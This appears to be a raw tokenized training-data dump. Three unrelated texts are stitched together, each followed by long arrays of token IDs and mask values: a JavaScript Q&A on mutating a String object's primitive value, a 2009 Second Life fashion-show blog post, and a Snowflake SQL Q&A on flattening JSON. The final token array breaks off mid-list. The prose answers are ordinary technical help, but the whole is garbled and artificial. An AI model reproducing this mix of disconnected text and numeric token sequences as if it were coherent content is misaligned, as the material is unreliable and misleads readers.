Q: Changing the Primitive-String a String-Object References Ignoring all best practices, I have a rather academic question that I'll ask for curiosity's sake. As you know, you can add custom properties to a string Object: var s = new String("initial string"); var s.customProperty = "Please Don't Forget about me"; Is it possible (without creating a new string object), to change the string-primitive that "s" references? Specifically, I want to change "s" (above), so that s == "new string", yet after making this change, I want s.customProperty to still point to the string-primitive: "Please Don't Forget about me". Again, I want to achieve this without having to create any new string objects. var s = new String("initial string"); var s.customProperty = "Please Don't Forget about me"; // What code must preceed the following "if statement" in order // for it to return "true" (giving the restrictions I described // in the paragraphs of this post)? if(s == "new string" && s.customProperty == "Please Don't Forget about me") { console.log("true"); } else { console.log("false"); } In other words, is possible to change a string object's reference-pointer without losing or cloning all custom properties that have been added to that string object? A: Is it possible to change the string-primitive that a "s" references? No. The [[StringData]] (ES6) / [[PrimitiveValue]] (ES5) it contains is an internal slot and cannot be mutated. … without having to create any new string objects. There's no way around that. What you possibly can do is to subclass String and overwrite all methods to refer to a mutable property, but that advice is as good as "don't use String objects". See also the answers to the inverse problem Is there a way to Object.freeze() a JavaScript Date?.
[ 1, 660, 29901, 13, 13, 1451, 9776, 278, 9724, 3321, 29899, 1231, 263, 1714, 29899, 2061, 28318, 13, 13, 17273, 8253, 599, 1900, 23274, 29892, 306, 505, 263, 3265, 21567, 1139, 393, 306, 29915, 645, 2244, 363, 27742, 29915, 29879, 16563, 29889, 13, 2887, 366, 1073, 29892, 366, 508, 788, 2888, 4426, 304, 263, 1347, 4669, 29901, 13, 1707, 269, 353, 716, 1714, 703, 11228, 1347, 1496, 13, 1707, 269, 29889, 6341, 4854, 353, 376, 12148, 3872, 29915, 29873, 1152, 657, 1048, 592, 1769, 13, 13, 3624, 372, 1950, 313, 14037, 4969, 263, 716, 1347, 1203, 511, 304, 1735, 278, 1347, 29899, 9469, 3321, 393, 376, 29879, 29908, 9282, 29973, 13, 10299, 928, 635, 29892, 306, 864, 304, 1735, 376, 29879, 29908, 313, 27215, 511, 577, 393, 269, 1275, 376, 1482, 1347, 613, 3447, 1156, 3907, 445, 1735, 29892, 306, 864, 269, 29889, 6341, 4854, 304, 1603, 1298, 304, 278, 1347, 29899, 9469, 3321, 29901, 376, 12148, 3872, 29915, 29873, 1152, 657, 1048, 592, 1642, 11454, 29892, 306, 864, 304, 6176, 445, 1728, 2534, 304, 1653, 738, 716, 1347, 3618, 29889, 13, 1707, 269, 353, 716, 1714, 703, 11228, 1347, 1496, 13, 1707, 269, 29889, 6341, 4854, 353, 376, 12148, 3872, 29915, 29873, 1152, 657, 1048, 592, 1769, 13, 13, 458, 1724, 775, 1818, 758, 3947, 278, 1494, 376, 361, 3229, 29908, 297, 1797, 13, 458, 363, 372, 304, 736, 376, 3009, 29908, 313, 29887, 4357, 278, 25091, 306, 5439, 13, 458, 297, 278, 14880, 29879, 310, 445, 1400, 6877, 13, 13, 361, 29898, 29879, 1275, 376, 1482, 1347, 29908, 2607, 269, 29889, 6341, 4854, 1275, 376, 12148, 3872, 29915, 29873, 1152, 657, 1048, 592, 1159, 13, 29912, 13, 1678, 2991, 29889, 1188, 703, 3009, 1496, 13, 29913, 13, 2870, 13, 29912, 13, 1678, 2991, 29889, 1188, 703, 4541, 1496, 13, 29913, 13, 13, 797, 916, 3838, 29892, 338, 1950, 304, 1735, 263, 1347, 1203, 29915, 29879, 3407, 29899, 17226, 1728, 19035, 470, 1067, 28259, 599, 2888, 4426, 393, 505, 1063, 2715, 304, 393, 1347, 1203, 29973, 13, 13, 29909, 29901, 13, 13, 3624, 372, 1950, 304, 1735, 278, 1347, 29899, 9469, 3321, 393, 263, 376, 29879, 29908, 9282, 29973, 13, 13, 3782, 29889, 450, 5519, 1231, 1469, 5262, 313, 2890, 29953, 29897, 847, 5519, 18213, 3321, 1917, 5262, 313, 2890, 29945, 29897, 372, 3743, 338, 385, 7463, 21497, 322, 2609, 367, 5478, 630, 29889, 13, 13, 30098, 1728, 2534, 304, 1653, 738, 716, 1347, 3618, 29889, 13, 13, 8439, 29915, 29879, 694, 982, 2820, 393, 29889, 13, 5618, 366, 10075, 508, 437, 338, 304, 19481, 1714, 322, 26556, 599, 3519, 304, 2737, 304, 263, 26691, 2875, 29892, 541, 393, 9848, 338, 408, 1781, 408, 376, 9176, 29915, 29873, 671, 1714, 3618, 1642, 2823, 884, 278, 6089, 304, 278, 16402, 1108, 1317, 727, 263, 982, 304, 4669, 29889, 9021, 911, 580, 263, 8286, 4712, 9808, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Day: December 21, 2009 Opium Fashion Agency presents Noir Couture: A History of Baiaistice in Black and White. This fashion show is so big that it takes two days for the Opium Models to grace the runway in the exquisite designs of Baiastice, beautifully accessorized with jewelry from CCD and Tukinowaguma hair. The show is being held December 22nd at 6pm and December 23rd at 1pm. The set is simply amazing with the theme of Old Hollywood Noir Couture Black and White. Haven’t done any Christmas shopping yet? Well, Come see the wonderful designs of Baiastice as well as gorgeous jewelry from CCD and hair from Tukinowaguma. We got those on your list taken care of. =) We want to wish everyone Very Happy Holidays. We have received so many wonderful Holiday Greetings in SL that we want to share it with everyone. We are amazed the love and creativity that goes into making these awesome Holiday cards. Veronica Krasner Starts us off…
[ 1, 8373, 29901, 5846, 29871, 29906, 29896, 29892, 29871, 29906, 29900, 29900, 29929, 13, 13, 29949, 1631, 398, 383, 10904, 29353, 22981, 1939, 381, 315, 449, 545, 29901, 319, 5298, 310, 6000, 423, 391, 625, 297, 6054, 322, 8037, 29889, 910, 13460, 1510, 338, 577, 4802, 393, 372, 4893, 1023, 3841, 363, 278, 438, 1631, 398, 3382, 1379, 304, 17659, 278, 1065, 1582, 297, 278, 429, 7680, 568, 25517, 310, 350, 1794, 579, 625, 29892, 9560, 368, 2130, 272, 1891, 411, 432, 809, 295, 719, 515, 315, 6530, 322, 323, 2679, 262, 340, 351, 10859, 11315, 29889, 450, 1510, 338, 1641, 4934, 5846, 29871, 29906, 29906, 299, 472, 29871, 29953, 3358, 322, 5846, 29871, 29906, 29941, 5499, 472, 29871, 29896, 3358, 29889, 450, 731, 338, 3763, 21863, 292, 411, 278, 10929, 310, 8198, 19180, 1939, 381, 315, 449, 545, 6054, 322, 8037, 29889, 13, 29950, 3496, 30010, 29873, 2309, 738, 17661, 17394, 3262, 3447, 29973, 5674, 29892, 16760, 1074, 278, 20695, 25517, 310, 350, 1794, 579, 625, 408, 1532, 408, 330, 3890, 681, 432, 809, 295, 719, 515, 315, 6530, 322, 11315, 515, 323, 2679, 262, 340, 351, 10859, 29889, 1334, 2355, 1906, 373, 596, 1051, 4586, 2562, 310, 29889, 353, 29897, 13, 13, 4806, 864, 304, 6398, 14332, 18064, 28569, 4168, 333, 1036, 29889, 1334, 505, 4520, 577, 1784, 20695, 4168, 22394, 4122, 300, 886, 297, 27146, 393, 591, 864, 304, 6232, 372, 411, 14332, 29889, 1334, 526, 21863, 287, 278, 5360, 322, 907, 28157, 393, 5771, 964, 3907, 1438, 29663, 4168, 22394, 15889, 29889, 1798, 26082, 476, 3417, 1089, 624, 5708, 502, 1283, 30098 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Q: How to extract data from complex json stored in Snowflake via SnowSQL? I have millions of JSON's stored in a single variant column table in Snowflake. They are in the following format, though the number of rows per JSON varies. Please could someone give me some guidance on how to extract the data into a flat table? I'm new to working with JSON files and between the inconsistent number of rows and the lack of an indicator to define the object name is confusing me. Here is a sample JSON: { "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AB2 Weight on Bit": 0.2714572, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AB2 Weight on Bit unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD Diff Press Gain SP": 0, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD Diff Press Gain SP unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD ROP": 0, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD ROP unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Calculated Pipe Displacement": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Calculated Pipe Displacement unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Cumulative Delta Displacement": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Cumulative Delta Displacement unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.FD Svy Quality": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.FD Svy Quality unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.GWEX SampleFlow": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.GWEX SampleFlow unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.MP3_STK": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.MP3_STK unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.PT Correction": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.PT Correction unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Pit 11 Jumps": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Pit 11 Jumps unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.ROP - #1 Ref Time": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.ROP - #1 Ref Time unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK2_VOL": 8.732743, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK2_VOL unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK4_VOL": 16.13105, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK4_VOL unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Time On Slip": 1.3, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Time On Slip unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.WPDA - Mud Motor Torque": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.WPDA - Mud Motor Torque unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Washout Factor": 4.167005, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Washout Factor unit": "", "DeviceId": "streamingdevice", "EventEnqueuedUtcTime": "2020-05-04T22:12:21.5310000Z", "EventProcessedUtcTime": "2020-05-04T22:12:35.6868329Z", "IoTHub": { "ConnectionDeviceGenerationId": "637199801617320690", "ConnectionDeviceId": "streamingdevice", "CorrelationId": null, "EnqueuedTime": "2020-05-04T22:12:21.0000000", "MessageId": null, "StreamId": null }, "PartitionId": 1, "Timestamp": "2019-10-30 13:48:05.000000" } "Edge 93 Belgium 43-23-19 1932" is an object name; each JSON is for a single object. "Time_1_Avg.AB2 Weight on Bit" is the reading type, essentially made up of Tag1.Tag2. The last part of the row is the reading value. The timestamp at the bottom of the JSON is the reading time. This section is not required: "DeviceId": "streamingdevice", "EventEnqueuedUtcTime": "2020-05-04T22:12:21.5310000Z", "EventProcessedUtcTime": "2020-05-04T22:12:35.6868329Z", "IoTHub": { "ConnectionDeviceGenerationId": "637199801617320690", "ConnectionDeviceId": "streamingdevice", "CorrelationId": null, "EnqueuedTime": "2020-05-04T22:12:21.0000000", "MessageId": null, "StreamId": null }, "PartitionId": 1, An ideal output for this data would be: But just getting something like this would be really helpful: Thank you for your help! A: Assuming that the required keys will always have 3 period-separated components, the following can be one form of solution: Uses the FLATTEN table function to take any VARIANT typed column from a table (1-row constant in example) and explode it into multiple rows Relies on the generated THIS column (from the FLATTEN table) to emit a row-constant value (Timestamp) for every exploded row Uses a NOT IN filter to exclude unwanted key names Uses the SPLIT function with indices to divide the extracted key into multiple columns SELECT SPLIT(KEY, '.')[0] AS "Object Name" , SPLIT(KEY, '.')[1] AS "Tag 1" , SPLIT(KEY, '.')[2] AS "Tag 2" , VALUE AS "Value" , THIS:Timestamp::TIMESTAMP AS "Timestamp" FROM TABLE(FLATTEN(PARSE_JSON(' { "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AB2 Weight on Bit": 0.2714572, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AB2 Weight on Bit unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD Diff Press Gain SP": 0, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD Diff Press Gain SP unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD ROP": 0, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.AD ROP unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Calculated Pipe Displacement": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Calculated Pipe Displacement unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Cumulative Delta Displacement": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Cumulative Delta Displacement unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.FD Svy Quality": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.FD Svy Quality unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.GWEX SampleFlow": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.GWEX SampleFlow unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.MP3_STK": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.MP3_STK unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.PT Correction": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.PT Correction unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Pit 11 Jumps": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Pit 11 Jumps unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.ROP - #1 Ref Time": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.ROP - #1 Ref Time unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK2_VOL": 8.732743, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK2_VOL unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK4_VOL": 16.13105, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.TANK4_VOL unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Time On Slip": 1.3, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Time On Slip unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.WPDA - Mud Motor Torque": -999.25, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.WPDA - Mud Motor Torque unit": "", "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Washout Factor": 4.167005, "Edge 93 Belgium 43-23-19 1932.Time_1_Avg.Washout Factor unit": "", "DeviceId": "streamingdevice", "EventEnqueuedUtcTime": "2020-05-04T22:12:21.5310000Z", "EventProcessedUtcTime": "2020-05-04T22:12:35.6868329Z", "IoTHub": { "ConnectionDeviceGenerationId": "637199801617320690", "ConnectionDeviceId": "streamingdevice", "CorrelationId": null, "EnqueuedTime": "2020-05-04T22:12:21.0000000", "MessageId": null, "StreamId": null }, "PartitionId": 1, "Timestamp": "2019-10-30 13:48:05.000000" } '))) WHERE KEY NOT IN ('DeviceId', 'IoTHub', 'PartitionId', 'Timestamp', 'EventEnqueuedUtcTime', 'EventProcessedUtcTime'); This should produce a result similar to your first screenshot:
[ 1, 660, 29901, 13, 13, 5328, 304, 6597, 848, 515, 4280, 4390, 6087, 297, 24392, 29888, 433, 446, 3025, 24392, 4176, 29973, 13, 13, 29902, 505, 14746, 310, 4663, 29915, 29879, 6087, 297, 263, 2323, 17305, 1897, 1591, 297, 24392, 29888, 433, 446, 29889, 2688, 526, 297, 278, 1494, 3402, 29892, 2466, 278, 1353, 310, 4206, 639, 4663, 722, 583, 29889, 13, 12148, 1033, 4856, 2367, 592, 777, 27323, 373, 920, 304, 6597, 278, 848, 964, 263, 12151, 1591, 29973, 306, 29915, 29885, 716, 304, 1985, 411, 4663, 2066, 322, 1546, 278, 22435, 9696, 1353, 310, 4206, 322, 278, 10225, 310, 385, 27717, 304, 4529, 278, 1203, 1024, 338, 16051, 592, 29889, 13, 10605, 338, 263, 4559, 4663, 29901, 13, 29912, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2882, 29906, 1334, 523, 373, 18531, 1115, 29871, 29900, 29889, 29906, 29955, 29896, 29946, 29945, 29955, 29906, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2882, 29906, 1334, 523, 373, 18531, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 360, 2593, 5254, 402, 475, 10937, 1115, 29871, 29900, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 360, 2593, 5254, 402, 475, 10937, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 390, 4590, 1115, 29871, 29900, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3035, 390, 4590, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 27065, 630, 7362, 412, 3295, 29886, 9552, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 27065, 630, 7362, 412, 3295, 29886, 9552, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29907, 398, 28524, 360, 2554, 3295, 29886, 9552, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29907, 398, 28524, 360, 2554, 3295, 29886, 9552, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26453, 317, 13308, 751, 2877, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 26453, 317, 13308, 751, 2877, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29954, 29956, 5746, 21029, 17907, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29954, 29956, 5746, 21029, 17907, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3580, 29941, 29918, 1254, 29968, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 3580, 29941, 29918, 1254, 29968, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 7982, 2994, 276, 428, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 7982, 2994, 276, 428, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29925, 277, 29871, 29896, 29896, 435, 17204, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29925, 277, 29871, 29896, 29896, 435, 17204, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29366, 448, 396, 29896, 9897, 5974, 1115, 448, 29929, 29929, 29929, 29889, 29906, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29366, 448, 396, 29896, 9897, 5974, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29906, 29918, 29963, 5607, 1115, 29871, 29947, 29889, 29955, 29941, 29906, 29955, 29946, 29941, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29906, 29918, 29963, 5607, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29946, 29918, 29963, 5607, 1115, 29871, 29896, 29953, 29889, 29896, 29941, 29896, 29900, 29945, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 29911, 2190, 29968, 29946, 29918, 29963, 5607, 5190, 1115, 12633, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 29899, 29906, 29941, 29899, 29896, 29929, 29871, 29896, 29929, 29941, 29906, 29889, 2481, 29918, 29896, 29918, 12810, 29887, 29889, 2481, 1551, 317, 3466, 1115, 29871, 29896, 29889, 29941, 29892, 13, 29871, 376, 23894, 29871, 29929, 29941, 9923, 1974, 29871, 29946, 29941, 